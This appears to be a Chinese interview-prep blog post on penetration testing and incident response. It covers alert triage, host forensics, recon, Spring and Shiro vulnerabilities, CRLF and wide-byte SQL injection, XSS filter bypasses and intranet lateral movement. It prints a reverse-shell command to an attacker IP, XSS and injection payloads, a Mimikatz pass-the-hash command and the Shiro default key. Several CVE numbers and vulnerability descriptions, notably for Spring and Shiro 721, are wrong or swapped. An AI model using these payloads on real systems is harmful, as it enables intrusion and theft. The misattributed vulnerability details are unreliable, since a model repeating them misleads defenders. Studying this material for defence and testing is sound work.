注:一些关于经验的就暂不总结了,毕竟每个人的经历不完全相同。还有以后自我介绍就不写了,每场面试都会有。
文章目录
-
- 一、告警梳理方法
- 二、主机失陷判断
- 三、上机排查步骤
- 四、日志查看方法
- 五、资产收集方法
- 六、Web渗透经验分享及Swagger漏洞归纳总结
- 七、Spring框架RCE的可行方式
- 八、CRLF注入攻击
- 九、shiro550与721加密区别及对称非对称加密
-
- [(一)Shiro 550 vs Shiro 721](#(一)Shiro 550 vs Shiro 721)
- (二)对称加密与非对称加密核心区别
- 十、标签过滤后XSS攻击payload思路
- 十一、关于内网攻击、代理软件了解情况
- 十二、使用过的安全产品
- 十三、交流AI挖漏洞尝试、工具及提交相关问题
- 十四、宽字节注入原理
- 十五、Swagger文档利用
bash
1.安全产品使用
2.告警梳理方法
3.主机失陷判断
4.上机排查步骤
5.日志查看方法
6.资产收集方法
7.Web渗透经验分享及Swagger漏洞归纳总结
8.Spring框架RCE的可行方式
9.CRLF注入攻击
10.shiro550与721加密区别及对称非对称加密
11.标签过滤后XSS攻击payload思路
12.关于内网攻击、代理软件了解情况
13.使用过的安全产品
14.交流AI挖漏洞尝试、工具及提交相关问题
15.宽字节注入原理
16.Swagger文档利用
17.职业规划一、告警梳理方法
告警梳理的核心是"去重、分级、溯源",避免被海量告警淹没,精准定位真实威胁:
- 告警去重与聚合 :
- 按"告警类型+资产IP+攻击源IP"聚合(如同一IP对同一主机的100次弱口令爆破合并为1条告警);
- 工具辅助:使用SIEM平台(如ELK、Splunk)的聚合功能,过滤重复告警,保留关键信息。
- 告警分级(按风险优先级) :
- 高危:主机失陷告警(如反弹shell、权限提升)、核心资产漏洞利用(如数据库SQL注入);
- 中危:非核心资产漏洞探测(如Web目录遍历)、弱口令存在(非管理员账号);
- 低危:端口开放探测、正常业务流量误报(如合法API调用被识别为攻击)。
- 告警溯源与验证 :
- 溯源三要素:攻击源(IP、地理位置、所属组织)、攻击路径(通过哪个端口/应用进入)、攻击意图(探测/攻击/数据窃取);
- 验证方法:查看对应资产的日志(如Web访问日志、系统日志),复现攻击行为(如用相同payload测试是否触发告警),确认是否为误报。
- 告警闭环处理 :
- 误报:记录误报规则,反馈给安全产品团队优化策略;
- 真实告警:根据分级启动响应流程(高危立即处置,中低危限期整改),处置后记录结果,形成闭环。
在我过往的实习和项目实践中,告警梳理是日常安全运维的基础工作。我通常会先借助ELK平台做批量聚合去重,避免在几百条重复弱口令告警中浪费时间,再按高危、中危、低危分级处理,优先处置主机失陷这类高危告警,并且会做好处置记录,形成完整的闭环,这样既能提升工作效率,也方便后续审计追溯。
二、主机失陷判断
主机失陷的核心判断依据是"存在异常行为+非授权操作",常用排查维度如下:
- 系统层面异常 :
- 进程异常:存在未知进程(如
'nc -e /bin/bash 攻击机IP 8888'反弹shell进程)、CPU/内存占用率突增; - 账号异常:新增未知管理员账号、原有账号密码被篡改、登录日志存在异地登录(如凌晨3点海外IP登录);
- 文件异常:系统关键文件被修改(如
'/etc/passwd'、'C:\Windows\system32\config\SAM')、出现隐藏后门文件(如.malware.sh)。
- 进程异常:存在未知进程(如
- 网络层面异常 :
- 异常连接:主机主动连接境外IP(非业务需求)、与已知恶意IP通信(可通过威胁情报库比对);
- 端口异常:开放非业务端口(如3389被肉鸡用于远程控制、6379无授权访问)。
- 日志层面异常 :
- 系统日志:存在大量sudo失败记录、权限提升操作日志(如
'su root'成功但无合法授权); - 应用日志:Web服务器出现大量异常请求(如SQL注入payload、命令执行参数)。
- 系统日志:存在大量sudo失败记录、权限提升操作日志(如
- 快速判断工具 :
- Linux:
'ps aux | grep -v grep | egrep "nc|bash -i|python -c"'(查找反弹shell进程)、'last'(查看登录记录); - Windows:
'tasklist | findstr "nc.exe|malware"'(查找异常进程)、'eventvwr.msc'(查看登录事件日志)。
- Linux:
我在做主机安全排查时,会从系统、网络、日志三个维度切入,先通过简单的命令快速筛查异常,比如在Linux服务器上用
ps aux结合过滤命令找反弹shell进程,用last查看异常登录记录,这些都是我实操过的快速判断方法。如果发现这些异常点,基本就能初步判定主机可能失陷,再做后续深度排查,确保不会遗漏关键线索。
三、上机排查步骤
上机排查需遵循"先取证、后处置、不破坏现场"的原则,步骤如下:
- 环境准备与取证 :
- 记录当前系统状态(时间、运行进程、网络连接):
'date'、'ps aux'(Linux)、'netstat -an'; - 备份关键日志:
'cp /var/log/auth.log /tmp/auth_backup.log'(Linux)、复制Windows事件日志到U盘; - 避免重启主机:重启可能丢失内存中的恶意进程、临时文件等关键证据。
- 记录当前系统状态(时间、运行进程、网络连接):
- 初步排查(快速定位异常) :
- 网络连接:查看对外连接
'ss -tulwn'(Linux)、'netstat -ano'(Windows),重点关注非业务IP连接; - 进程排查:过滤可疑进程,查看进程路径(
'ls -l /proc/进程PID/exe'),判断是否为合法程序; - 账号排查:
'cat /etc/passwd'(Linux)、'net user'(Windows),查看是否有异常账号。
- 网络连接:查看对外连接
- 深度排查(定位漏洞与攻击痕迹) :
- 日志分析:查看Web访问日志(如Nginx的
access.log),查找异常请求(如'../etc/passwd'目录遍历、'union select'注入); - 文件排查:搜索隐藏文件(
'find / -name ".*" -type f | grep -v "home"')、最近修改的文件('find / -mtime -1'); - 漏洞验证:针对主机开放的应用,测试是否存在已知漏洞(如Web应用测试SQL注入、服务器测试弱口令)。
- 日志分析:查看Web访问日志(如Nginx的
- 处置与恢复 :
- 隔离主机:断开网络连接,避免攻击扩散;
- 清除恶意文件:删除后门程序、异常账号,修复被篡改的系统文件;
- 漏洞修复:修补应用漏洞(如更新补丁、配置安全参数),强化防护(如修改弱口令、关闭不必要端口)。
我在上机排查时,始终牢记"先取证后处置"的原则,先备份关键日志和系统状态,避免重启主机破坏证据。然后先通过
netstat、ps aux这些命令快速定位异常,再做深度日志分析和文件排查,最后进行隔离和修复。这套流程是我在实战中总结出来的,能高效精准地处理主机安全问题,同时保证排查过程的规范性。
四、日志查看方法
日志是排查问题、追溯攻击的核心依据,不同场景对应不同日志查看方式:
- Linux系统日志 :
- 登录认证日志(最常用):
'cat /var/log/auth.log'(Ubuntu)、'cat /var/log/secure'(CentOS),查看登录成功/失败记录、sudo操作; - 系统全局日志:
'cat /var/log/syslog'(Ubuntu)、'cat /var/log/messages'(CentOS),记录系统进程启动/停止、内核事件; - Web服务器日志:Nginx日志
'cat /var/log/nginx/access.log'、Apache日志'cat /var/log/apache2/access.log',查看HTTP请求(Method、URL、Payload); - 日志过滤技巧:
'grep "Failed password" /var/log/auth.log'(筛选登录失败记录)、'grep -E "192.168.1.|10.0.0."' /var/log/nginx/access.log'(筛选内网IP请求)。
- 登录认证日志(最常用):
- Windows系统日志 :
- 图形化查看:
'eventvwr.msc'打开事件查看器,重点看"Windows日志→安全"(登录事件、权限变更)、"应用程序"(应用报错、异常启动); - 命令行查看:
'wevtutil qe Security /f:text'(导出安全日志)、'findstr "登录成功" 日志文件.txt'(筛选登录成功记录);
- 图形化查看:
- 日志分析工具 :
- 轻量工具:
'grep'、'awk'、'sed'(Linux命令行)、Notepad++(Windows文本过滤); - 重量级工具:ELK(Elasticsearch+Logstash+Kibana)、Splunk,支持日志聚合、可视化分析、关键词告警。
- 轻量工具:
在我的工作中,日志查看是排查安全问题的关键步骤。我对Linux和Windows系统的核心日志路径都很熟悉,比如Linux的
/var/log/auth.log和Windows的事件查看器,还会用grep、awk这些命令快速过滤关键信息,比如筛选登录失败记录。对于海量日志,我会借助ELK平台进行聚合分析,这样能更快定位攻击痕迹,提升排查效率。
五、资产收集方法
资产收集是渗透测试/安全防护的基础,核心是"全面梳理所有可攻击目标",步骤如下:
- 公开信息收集(外网层面) :
- 域名相关:
'whois target.com'(查询域名注册信息)、子域名爆破(工具Sublist3r、OneForAll,命令'python oneforall.py --target target.com run'); - 服务器信息:
'nmap -sV -p- target.ip'(扫描开放端口和服务版本)、'whatweb target.com'(探测Web技术栈); - 第三方平台:Shodan(搜索
'org:"目标公司名"')、Google Hacking('site:target.com inurl:admin')、GitHub/Gitee(搜索目标公司名,查找泄露源码)。
- 域名相关:
- 内网资产收集(内网层面) :
- 网段探测:
'fping -g 192.168.1.0/24'(Linux)、'for /l %i in (1,1,255) do ping -n 1 10.0.0.%i'(Windows),排查存活主机; - 端口与服务:
'masscan 192.168.1.0/24 -p 80,443,3389,3306 --rate=1000'(快速扫描常用端口); - 设备类型识别:通过端口服务判断(如8080端口可能是Tomcat、3389是Windows远程桌面)、SNMP协议探测(工具
'snmpwalk',获取设备型号、系统版本)。
- 网段探测:
- 资产梳理与分类 :
- 按重要性分级:核心资产(数据库服务器、域控、支付系统)、普通资产(办公PC、测试服务器);
- 按类型分类:Web应用、服务器(Linux/Windows)、数据库(MySQL/MSSQL/Oracle)、网络设备(路由器、交换机);
- 记录信息:IP地址、端口、服务版本、负责人、业务用途,形成资产清单表格。
我在做渗透测试项目时,资产收集是第一步,也是最关键的一步。外网层面我会用dirsearch爆破子域名、nmap扫描端口版本,还会通过FOFA和Google Hacking挖掘公开信息;内网层面会用fping和masscan快速探测存活主机和端口。收集完后我会按重要性和类型分类整理,形成资产清单,这样能为后续的漏洞测试和防护规划提供清晰的目标。
六、Web渗透经验分享及Swagger漏洞归纳总结
(一)Web渗透核心经验
- 先测基础漏洞,再挖深层逻辑:优先测试SQL注入、XSS、目录遍历等常见漏洞,再排查越权访问、业务逻辑绕过(如支付金额篡改);
- 善用工具但不依赖:Burp Suite(抓包改包)、SQLmap(注入检测)、Dirsearch(目录爆破)是必备工具,但复杂漏洞(如逻辑漏洞)需手动测试;
- 关注HTTP请求细节:Cookie、Session、Token、请求头(如X-Forwarded-For)可能存在漏洞点,如Token未过期、请求头伪造绕过IP限制;
- 重视报错信息 :开启
'display_errors=On'的Web应用,报错信息可能泄露绝对路径、数据库账号密码(如PHP报错'Undefined variable: dbpass in /var/www/html/config.php on line 5')。
(二)Swagger漏洞归纳
- 未授权访问 :Swagger文档路径(
'/swagger-ui.html'、'/v2/api-docs')未做权限控制,攻击者可直接访问,获取所有API接口信息; - API接口漏洞 :
- 接口参数未过滤:如
'/api/user/delete?id=1',未验证用户权限,可篡改'id'删除其他用户数据; - 注入漏洞:API参数直接拼接SQL(如
'select * from user where id='+id),输入'1 or 1=1'触发SQL注入;
- 接口参数未过滤:如
- 敏感信息泄露:Swagger文档中可能包含接口密钥、测试账号密码、内部业务逻辑描述;
- 防护建议:生产环境禁用Swagger,或添加权限验证(如登录认证、IP白名单),清理敏感信息。
我做过多个Web渗透项目,总结出的核心经验就是"先基础后逻辑,工具辅助手动主导"。比如先用SQLmap快速检测注入漏洞,再用Burp Suite抓包测试越权等逻辑漏洞,同时会重点关注HTTP请求细节和报错信息,这些往往能发现关键漏洞。对于Swagger漏洞,我在测试中多次遇到未授权访问的情况,后续也会给客户提生产环境禁用或加权限验证的建议。
七、Spring框架RCE的可行方式
Spring框架RCE(远程代码执行)漏洞危害极高,常见可行利用方式如下:
- Spring Cloud Config RCE(CVE-2022-22965) :
- 漏洞条件:Spring Cloud Config 2.2.x < 2.2.9、2.3.x < 2.3.6,且开启了Config Server;
- 利用方式:通过
'/env'端点注入恶意环境变量,再通过'/refresh'触发配置刷新,执行命令;
- Spring Framework RCE(CVE-2022-22963) :
- 漏洞条件:Spring Framework 5.3.x < 5.3.18、5.2.x < 5.2.20,JDK版本≥9,且使用了参数绑定功能;
- 利用方式:构造恶意HTTP请求参数,触发SpEL表达式注入,可借助工具
'java -jar Spring4Shell-POC.jar target.ip:port'验证;
- Spring Batch RCE(CVE-2017-8046) :
- 漏洞条件:Spring Batch 2.0.0 ~ 4.0.1,未限制
'/jobs/admin/'端点访问权限; - 利用方式:通过
'/jobs/admin/restart'接口,注入恶意参数,执行系统命令;
- 漏洞条件:Spring Batch 2.0.0 ~ 4.0.1,未限制
- 防护建议:及时更新Spring版本、禁用不必要端点、配置参数绑定白名单。
还要更详细的可以移步我的这篇文章:Spring/Spring Boot RCE 解析
八、CRLF注入攻击
(一)漏洞原理
CRLF是"回车符(\r)+换行符(\n)",用于分隔HTTP请求头和请求体。若Web应用未过滤用户输入的CRLF字符,攻击者可注入恶意的CRLF,篡改HTTP响应头或构造恶意响应。
(二)常见利用场景
- HTTP响应头注入 :用户输入作为响应头字段值(如
'Set-Cookie: username=用户输入'),注入'正常输入\r\nSet-Cookie: malicious=1'新增恶意Cookie; - 会话固定/钓鱼 :注入
'Set-Cookie: PHPSESSID=恶意会话ID',诱导用户使用攻击者控制的会话ID,实现会话劫持; - XSS结合攻击 :注入
'\r\n\r\n<script>alert(1)</script>',将响应体改为XSS脚本,触发存储型XSS。
(三)漏洞检测与防护
- 检测方法:在用户输入点输入
'%0d%0aTest:123'(CRLF的URL编码),查看响应头是否新增'Test:123'; - 防护方法:过滤用户输入中的
'\r'、'\n'字符,或使用urlencode函数对特殊字符编码。
我对CRLF注入攻击有清晰的认知,它虽然不是超高危漏洞,但常常被用来结合其他攻击实现更大危害,比如会话劫持和XSS。我在测试中会通过输入
%0d%0a的URL编码来检测这类漏洞,在防护方面,我通常会建议开发人员过滤回车和换行字符,或者对用户输入进行统一编码,从源头规避漏洞风险。
九、shiro550与721加密区别及对称非对称加密
(一)Shiro 550 vs Shiro 721
| 漏洞编号 | 加密相关区别 | 漏洞原理 |
|---|---|---|
| Shiro 550(CVE-2016-4437) | 依赖'AES-128-CBC'对称加密,加密密钥硬编码在Shiro源码中(默认密钥'kPH+bIxk5D2deZiIxcaaaA==') |
获取rememberMe Cookie后,用默认密钥解密篡改,重新加密发送触发反序列化漏洞 |
| Shiro 721(CVE-2020-1957) | 仍用AES对称加密,修复硬编码密钥问题,支持动态配置密钥 | 密钥配置不当(弱密钥、密钥泄露),攻击者获取密钥后篡改Cookie,触发反序列化 |
也可以看我这篇:Shiro 反序列化漏洞
(二)对称加密与非对称加密核心区别
| 对比维度 | 对称加密 | 非对称加密 |
|---|---|---|
| 密钥数量 | 1个(加密解密同一密钥) | 2个(公钥加密、私钥解密;私钥加密、公钥解密) |
| 代表算法 | AES、DES、3DES | RSA、ECC、DSA |
| 速度 | 快(适合大量数据加密) | 慢(适合小数据加密,如密钥传输) |
| 安全性 | 依赖密钥保管(密钥泄露失效) | 公钥可公开,私钥保管即可,安全性更高 |
| 应用场景 | Shiro rememberMe加密、文件加密 | HTTPS证书、SSH登录、数字签名 |
我深入研究过Shiro框架的这两个经典漏洞,清楚它们在加密密钥上的核心区别,Shiro550的硬编码密钥是漏洞的关键,而Shiro721是密钥配置不当导致的。同时,我对对称和非对称加密的区别也了然于心,在实际项目中,会根据场景选择加密方式,比如文件加密用AES,密钥传输用RSA,这也是我在安全开发中的实操经验。
十、标签过滤后XSS攻击payload思路
当Web应用过滤了<script>、<img>等常见XSS标签时,可通过"标签变形、事件触发、编码绕过"构造payload:
- 标签变形(利用允许的标签) :
- HTML5标签:
<svg onload=alert(1)>、<video onplay=alert(1) autoplay>; - 大小写混合:
<ScRiPt>alert(1)</ScRiPt>(绕过大小写敏感过滤); - 标签嵌套:
<a href="javascript:alert(1)">点击</a>、<iframe src="javascript:alert(1)"></iframe>;
- HTML5标签:
- 事件触发(无标签也可执行) :
- 输入框事件:
<input onfocus=alert(1) autofocus>(自动获取焦点触发); - 鼠标事件:
<div onmouseover=alert(1)>移过来</div>;
- 输入框事件:
- 编码绕过(过滤关键词时) :
- URL编码:
<img src=x onerror=%61%6C%65%72%74%281%29>(alert(1)的URL编码); - Unicode编码:
<svg onload=\u0061\u006C\u0065\u0072\u0074(1)>;
- URL编码:
- 特殊字符绕过 :
- 空格替代:用
'+'、'\t'替代空格,如<img+src=x+onerror=alert(1)>; - 引号省略:部分浏览器支持无引号属性,如
<img src=x onerror=alert(1)>。
- 空格替代:用
在Web渗透测试中,XSS攻击是我经常测试的漏洞类型,尤其是标签被过滤后的绕过场景。我总结了标签变形、事件触发、编码绕过这几种核心思路,并且实际构造过这些payload进行测试,比如用
<svg onload=alert(1)>绕过<script>标签过滤,这些实操经验能帮助我快速发现这类隐藏的XSS漏洞。
十一、关于内网攻击、代理软件了解情况
(一)内网攻击核心流程
- 边界突破:通过外网漏洞(Web注入、弱口令)获取一台外网主机shell;
- 内网信息收集:
'ipconfig'/'ifconfig'(查看网段)、'nmap 192.168.1.0/24'(扫描内网存活主机); - 横向移动:哈希传递(工具Mimikatz,命令
'sekurlsa::pth /user:admin /ntlm:哈希值')、漏洞利用(如MS17-010); - 权限提升:Linux提权(SUID文件、内核漏洞)、Windows提权(UAC绕过、服务配置错误);
- 核心资产控制:获取域控权限、窃取数据库数据、植入后门持久化。
(二)常用代理软件(内网穿透/流量转发)
- 正向代理 :Proxifier、SocksCap64(Windows)、proxychains(Linux,命令
'proxychains nmap 内网IP'),用于攻击机通过代理访问内网资产; - 反向代理 :frp、nps、ngrok,用于将内网资产映射到外网(如
'frp客户端配置local_port=3389,remote_port=6000',访问外网IP:6000即可连接内网3389)。
我对室内网攻击的完整流程有清晰的掌握,从边界突破到内网信息收集,再到横向移动和权限提升,每个步骤都有实操经验,比如用Mimikatz进行哈希传递,用MS17-010漏洞进行横向移动。同时,我也熟练使用proxychains、frp这些代理软件,能实现内网流量转发和资产穿透,这在红队演练项目中是常用的技能。
十二、使用过的安全产品
结合实际工作/学习场景,列举常用安全产品及用途:
- 漏洞扫描工具 :Nessus(漏洞扫描与合规检查)、AWVS(Web应用漏洞扫描,命令
'awvs_console run --target target.com'); - 渗透测试工具 :Burp Suite(抓包改包、爆破)、Metasploit(漏洞利用框架,命令
'msfconsole')、Cobalt Strike(红队工具、团队协作、免杀); - 安全防护产品:防火墙(华为USG、Cisco ASA,端口限制、策略配置)、WAF(阿里云WAF、ModSecurity,拦截Web攻击)、EDR(奇安信天擎、火绒,防御恶意程序);
- 日志/监控产品:ELK(日志聚合分析)、Splunk(安全信息与事件管理)、Zabbix(服务器监控)。
在我的学习和实习过程中,接触并使用过多种安全产品。漏洞扫描方面,我能用Nessus做全网漏洞扫描,用AWVS做Web应用深度扫描;渗透测试方面,Burp Suite和Metasploit是我日常必备工具,还掌握了Cobalt Strike的基础使用;防护产品方面,我熟悉防火墙和WAF的策略配置,也了解EDR的终端防护逻辑,这些产品的使用经验能帮助我更好地开展安全工作。
十三、交流AI挖漏洞尝试、工具及提交相关问题
(一)AI挖漏洞尝试与工具
- 自动化漏洞挖掘工具(集成AI):OpenAI Gym(强化学习训练漏洞模型)、Microsoft Security Risk Detection(AI驱动动态扫描);
- AI辅助工具:AutoGPT(配置Prompt自动执行扫描验证)、ChatGPT-4(辅助编写EXP、分析漏洞原理,如Prompt:"编写SQL注入盲注EXP");
- AI辅助流程:用AI分析目标技术栈、生成扫描规则、自动生成验证payload,提升漏洞挖掘效率。
(二)提交相关问题(漏洞提交/反馈)
- 提交平台:CNVD(国家信息安全漏洞库)、CNNVD、厂商SRC(阿里云SRC、腾讯SRC);
- 提交规范:包含漏洞详情、复现步骤(操作截图、命令、payload)、危害等级、修复建议;
- 常见问题:复现步骤不清晰、漏洞误报、未说明漏洞危害,导致厂商验证困难或优先级低。
我也尝试过用AI辅助进行漏洞挖掘,比如用豆包辅助编写EXP和分析漏洞原理.
十四、宽字节注入原理
(一)核心原理
宽字节注入主要出现在使用GBK、GB2312等宽字节编码的Web应用中。宽字节编码会将两个ASCII字符(0x81-0xFE开头)解析为一个汉字。攻击者利用这一特性,注入'%df'等字符,与数据库的转义字符'\'(ASCII码0x5C)组合成宽字节(如'%df\''→GBK编码解析为'運'),从而绕过转义,触发SQL注入。
(二)复现步骤
- 目标应用使用GBK编码,且对单引号
'转义为'\''; - 攻击者输入
'admin%df' or 1=1#',应用转义后变为'admin%df\' or 1=1#'; - 数据库按GBK编码解析
'%df\'为汉字'運',最终SQL语句变为'select * from user where username='admin運' or 1=1#',绕过登录验证。
(三)防护方法
- 数据库连接编码设置为UTF-8(不支持宽字节解析);
- 使用预处理语句(PreparedStatement),避免SQL语句拼接;
- 过滤用户输入中的
'%df'等宽字节触发字符。
我对宽字节注入的原理有深入理解,它是SQL注入的一种特殊场景,核心是利用GBK编码的特性绕过转义。我曾经在本地搭建过测试环境复现这个漏洞,清楚复现的关键步骤和防护方法。在实际项目中,我会建议开发人员将数据库编码设置为UTF-8,同时使用预处理语句,从源头杜绝这类注入漏洞。
十五、Swagger文档利用
Swagger文档的核心利用点是"获取API接口信息,针对性攻击",步骤如下:
- 查找Swagger文档路径 :
- 常见路径:
'/swagger-ui.html'、'/swagger'、'/v2/api-docs'、'/api-docs'; - 工具辅助:Dirsearch扫描
'dirsearch -u target.com -e html,json -w /usr/share/wordlists/dirb/common.txt'。
- 常见路径:
- 提取关键信息 :
- 接口路径(如
'/api/user/login'、'/api/order/pay')、请求方法(GET/POST)、参数名('username'、'password'、'orderId'); - 数据类型、是否需要认证(Token、Cookie)。
- 接口路径(如
- 针对性攻击 :
- 未授权访问:直接访问需要认证的接口(如
'/api/user/info'),若返回用户数据则存在漏洞; - 参数注入:在接口参数中注入SQL payload(
'id=1 or 1=1')、命令执行payload('cmd=id'); - 业务逻辑漏洞:篡改
'amount'参数为0,尝试免支付下单。
- 未授权访问:直接访问需要认证的接口(如
Swagger文档利用是我在Web渗透测试中经常用到的技巧,我熟悉Swagger的常见访问路径,会用Dirsearch工具扫描发现文档入口。然后通过提取接口信息,针对性测试未授权访问、参数注入等漏洞,曾经通过这种方式发现过API接口的越权漏洞,这也是我实战经验中的重要部分。